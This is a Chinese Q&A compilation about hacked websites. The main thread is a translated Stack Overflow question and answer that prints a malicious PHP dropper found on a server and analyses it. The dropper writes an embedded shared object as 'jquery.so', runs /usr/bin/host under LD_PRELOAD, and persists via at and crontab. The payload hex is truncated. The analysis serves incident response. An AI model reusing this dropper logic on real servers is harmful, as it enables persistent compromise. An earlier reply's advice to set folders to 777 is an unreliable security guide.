我的网站被黑了，index页找不到，文件夹显示隐藏也找不到，网站还能正常显示index，另外无法上传图片了

Posted 2023-05-02

找不到index页，想覆盖掉，提示拒绝访问。另外二级网站等后台上传图片功能都出现了问题，添加图片显示无法连接到intenet，求大侠指点。。。

网站的ftp访问权限出了问题。
登录后台改为777全权访问即可。
用ftp工具软件也可以修改。如cuteftp,鼠标右击网站的www文件夹，选择最后一项“属性/CHMOD”，全打上勾，应该可以解决。如此无法，联系空间商解决。追问

我不是ftp登录的，我可以直接登录服务器。。。访问网站的所有文件。。。但是就是找不到index，可是index一定在，因为可以访问

追答

你用远程登录服务器是吧，你那个帐号权限有问题。你可能需要去机房了。

追问

我是远程桌面登录的，一直都是好的，今天被黑了，与权限无关吧。。。刚才杀了一下毒，找到index了。。。但百度首页还是显示被恶意篡改了。。。

追答

嗯，解决问题就好。还有什么需要交流的，欢迎提出。

追问

我把index改回来后进不去网站了。。。换服务器换网站都不行。。。毒也杀过了。。。

追答

你仔细看一下，确认网站的首页是不是index，就算是index,还有index.htm index.html index.asp index.php之类，你仔细看清楚

参考技术A 出现这种问题，自己一般可以解决，但是不修复漏洞的话，还是会被黑客黑的，所以建议你找专业的安全公司来服务。防止安全事故的发生追问

这个还真没解决，换服务器，换网站所有文件都不行，而且二级网站都被黑了。。。

我被黑了，现在我有一个奇怪的 PHP 文件。它在做啥？

【中文标题】我被黑了，现在我有一个奇怪的 PHP 文件。它在做啥？

【英文标题】：I have been hacked, now I have a weird PHP file. What is it doing?我被黑了，现在我有一个奇怪的 PHP 文件。它在做什么？

【发布时间】：2015-05-06 13:12:02

【问题描述】：

所以我前一阵子被黑了，现在我的文件管理器中有一个奇怪的 PHP 文件。这是它的内容：

<?php
@touch("index.html");
header("Content-type: text/plain");
print "2842123700\n";
if (! function_exists('file_put_contents')) 
    function file_put_contents($filename, $data) 
        $f = @fopen($filename, 'w');
        if (! $f)
            return false;
        $bytes = fwrite($f, $data);
        fclose($f);
        return $bytes;
    

@system("killall -9 ".basename("/usr/bin/host"));
$so32 = "\x7f\x45\x4c\x46\x01\x01\x01\x00\x00\x00\x ... ETC ...";
$so64 = "\x7f\x45\x4c\x46\x02\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x3e\x00\x01\x00\x00\x00\x78\x13\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ ...ETC...";
$arch = 64;
if (intval("9223372036854775807") == 2147483647)
    $arch = 32;
$so = $arch == 32 ? $so32 : $so64;
$f = fopen("/usr/bin/host", "rb");
if ($f) 
    $n = unpack("C*", fread($f, 8));
    $so[7] = sprintf("%c", $n[8]);
    fclose($f);

$n = file_put_contents("./jquery.so", $so);
$AU=@$_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"];
$HBN=basename("/usr/bin/host");
$SCP=getcwd();
@file_put_contents("1.sh", "#!/bin/sh\ncd '".$SCP."'\nif [ -f './jquery.so' ];then killall -9 $HBN;export AU='".$AU."'\nexport LD_PRELOAD=./jquery.so\n/usr/bin/host\nunset LD_PRELOAD\ncrontab -l|grep -v '1\.sh'|grep -v crontab|crontab\nfi\nrm 1.sh\nexit 0\n");
@chmod("1.sh", 0777);
@system("at now -f 1.sh", $ret);
if ($ret == 0) 
    for ($i = 0; $i < 5; $i++) 
        if (! @file_exists("1.sh")) 
            print "AT success\n";
            exit(0);
        
        sleep(1);
    

@system("(crontab -l|grep -v crontab;echo;echo '* * * * * ".$SCP."/1.sh')|crontab", $ret);
if ($ret == 0) 
    for ($i = 0; $i < 62; $i++) 
        if (! @file_exists("1.sh")) 
            print "CRONTAB success\n";
            exit(0);
        
        sleep(1);
    

@system("./1.sh");
@unlink("1.sh");
?>

当然，我删除它。但它做了什么？是否有更多文件被感染？

我知道它正在检查系统是 32 位系统还是 64 位系统，然后它会创建 1.sh 并执行它但是然后呢？

完整代码：http://pastebin.com/hejkuQtV

【问题讨论】：

你甚至可能被shell感染。

您需要找出文件是如何到达那里的，关闭漏洞，然后重新安装整个帐户/服务器。你在使用 WordPress 吗？

无论它是什么，它都是在您的服务器上创建或试图创建 cron 作业的。可能是暴力破解或 DDOS 其他服务器。

您的系统可能已被拥有。您需要进行比删除 PHP 文件更彻底的清理工作。

你能给我们提供完整的十六进制字符串吗？

【参考方案1】：

我试图分析代码。看看这个并检查我的 cmets 关于 shell 脚本“1.sh”。在我看来，删除 PHP 脚本是不够的。

<?php

//probably the attacker wants to check that the script works.
@touch("index.html");
header("Content-type: text/plain");
print "2842123700\n";

//redefine file_put_contents if doesn't exist
if (! function_exists('file_put_contents')) 
    function file_put_contents($filename, $data) 
        $f = @fopen($filename, 'w');
        if (! $f)
            return false;
        $bytes = fwrite($f, $data);
        fclose($f);
        return $bytes;
    


//kill all running instances of host command. "host" command is used for DNS lookups among other things.
@system("killall -9 ".basename("/usr/bin/host"));

//32 bit
$so32 = "\x7f\x45\x4c\x46\x01\x01\x01\x00\x00\x00\x ... ETC ...";

//64 bit
$so64 = "\x7f\x45\x4c\x46\x02\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x3e\x00\x01\x00\x00\x00\x78\x13\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ ...ETC...";
$arch = 64;

//decide on the architecture based on the value of max int
if (intval("9223372036854775807") == 2147483647)
    $arch = 32;

//the hex based on architecture. "so" probably contains a function() used by "host". The attacker is replacing it later before running "host" command.    
$so = $arch == 32 ? $so32 : $so64;

//read 8 bytes from "host" binary file, and unpack it as an unsigned char.
$f = fopen("/usr/bin/host", "rb");
if ($f) 

    //n is an array of unsigned chars. Each array item can be (0-255)
    $n = unpack("C*", fread($f, 8));

    //convert to ascii, and replace the 7th character in the string with a value obtained from "hosts" binary file.
    //This vale from "hosts" will be specific to current server/environment - set during compilation/installation. 
    //NOTE: The contents of "so" string, will be written to a new file "jquery.so".
    $so[7] = sprintf("%c", $n[8]);


    fclose($f);


//the shared object
$n = file_put_contents("./jquery.so", $so);

//The shared object "jquery.so" uses an environment variable named "AU". It's more clear later.
$AU=@$_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"];

//should give "host"
$HBN=basename("/usr/bin/host");

//current dir
$SCP=getcwd();


//Examining the following line, here's what it writes to 1.sh
@file_put_contents("1.sh", "#!/bin/sh\ncd '".$SCP."'\nif [ -f './jquery.so' ];then killall -9 $HBN;export AU='".$AU."'\nexport LD_PRELOAD=./jquery.so\n/usr/bin/host\nunset LD_PRELOAD\ncrontab -l|grep -v '1\.sh'|grep -v crontab|crontab\nfi\nrm 1.sh\nexit 0\n");
    /*
    * #!/bin/sh
    * cd '/path/to/1.sh'
    * if [ -f './jquery.so' ];then 
    * killall -9 host;
    * export AU='MYSERVER.COM/THE/REQUEST/URI'  //this will be referenced in "jquery.so"
    * export LD_PRELOAD=./jquery.so //load the shared object before executing "host" command. THIS IS THE CORE OF THE ATTACK. Load the attacker's shared object(which contains his function, lets call it "xyz") before executing "host" command.
    * /usr/bin/host //execute. At that point, if "host" is making use of function "xyz", it would have been replaced by malicious "xyz" from "jquery.so" And since you don't know what the attacker function is actually doing, you should assume YOUR SYSTEM IS COMPROMISED.
    * unset LD_PRELOAD
    * crontab -l|grep -v '1\.sh'|grep -v crontab|crontab //not sure about this.
    * fi
    * rm 1.sh //remove
    * exit 0
    */


@chmod("1.sh", 0777);
@system("at now -f 1.sh", $ret); //execute 1.sh. It will be deleted once it's executed as per the "rm" statement.
if ($ret == 0) 

    //try for 5 seconds until the file is deleted (hence executed). If so, then all good.
    for ($i = 0; $i < 5; $i++)  
        if (! @file_exists("1.sh")) 
            print "AT success\n";
            exit(0);
        
        sleep(1);
    


//another attempt to execute the file in case the above failed.
@system("(crontab -l|grep -v crontab;echo;echo '* * * * * ".$SCP."/1.sh')|crontab", $ret);
if ($ret == 0) 

    //keep trying for 60 seconds until the file is deleted (as per the crontab setup.)
    for ($i = 0; $i < 62; $i++) 
        if (! @file_exists("1.sh")) 
            print "CRONTAB success\n";
            exit(0);
        
        sleep(1);
    


//the last resort if the previous execute attempts didn't work.
@system("./1.sh");
@unlink("1.sh");
?>

这里有更多信息。首先，我们可以使用这段代码生成“.so”文件。

<?php
    //build the attack string (this contains the hex representation of the attacker complied/linked program)
    $so32="\x7f\x45\x4c\x46\x01\x01\x01\x00\x00\x00\x00\x00\x00.....";

    //print it. This will output the binary
    echo $so32;
?>

//run
php hack.php > jquery.so

此时，我们拥有了攻击者在运行“host”之前加载的相同共享对象。使用“字符串”命令：

$ strings ./jquery.so
Output:
    write
    unlink
    pthread_mutex_lock
    pthread_mutex_unlock
    gettimeofday
    free
    realloc
    strdup
    read
    getaddrinfo
    freeaddrinfo
    socket
    setsockopt
    connect
    malloc
    mmap
    munmap
    usleep
    strcmp
    dlclose
    pthread_join
    __errno_location
    strncmp
    sprintf
    strcpy
    time
    vsnprintf
    strcat
    strstr
    atoi
    strchr
    dlopen
    dlsym
    pthread_create
    srandom
    lseek
    ftruncate
    umask
    setsid
    chroot
    _exit
    signal
    fork
    dladdr
    realpath
    getpid
    execl
    wait
    getsockname
    getenv
    geteuid
    unsetenv
    popen
    fgets
    fclose
    QQRW
    1c2#N
    v[uq
    M!k(q.%
    jc[Sj
    F,%s,%x
    R,%d,%d,%d,%s,%s,
    P,%u,%u,%u,%u,%u
    POST %s HTTP/1.0
    Host: %s
    Pragma: 1337
    Content-Length: %d
    core
    %s/%s
    |$$$rstuvwxyz$$$$$$$>?@ABCDEFGHIJKLMNOPQRSTUVW$$$$$$XYZ[\]^_`abcdefghijklmnopq
    /dev/null
    %s/%c.%d
    (null)
    ROOT
    LD_PRELOAD
    /usr/bin/uname -a
    /tmp

如您所见，他的 hack 似乎使用了很多功能，包括他在某处发出 POST 请求。当然不可能从上面弄清楚，但会给你一些线索。

如果你想更进一步，你可以查看 ELF 反编译器。但我怀疑你能否得出任何结论性的结论。我不是专家，但我的建议是继续监视您的网络活动，以发现任何异常情况。

“file”命令为您提供有关文件的一些信息 - 因此是 ELF 反编译器。

$ file ./jquery..so
Output:
    ./jquery.so: ELF 32-bit LSB shared object, Intel 80386, version 1 (SYSV), dynamically linked, stripped

【讨论】：

谢谢，我们是在 DirectAdmin 上运行的，应该不会影响其他人吧？

我不知道攻击的程度以及谁会受到影响。这取决于您的基础设施等。我用更多的位更新了答案。系统管理员可能会提供更多帮助。

如果你想复制主机命令运行时的行为，你需要做：“export LD_PRELOAD = jquery.so; /usr/bin/host;”看看你在 Wireshark 中得到了什么。但这只会显示发出的 HTTP 请求。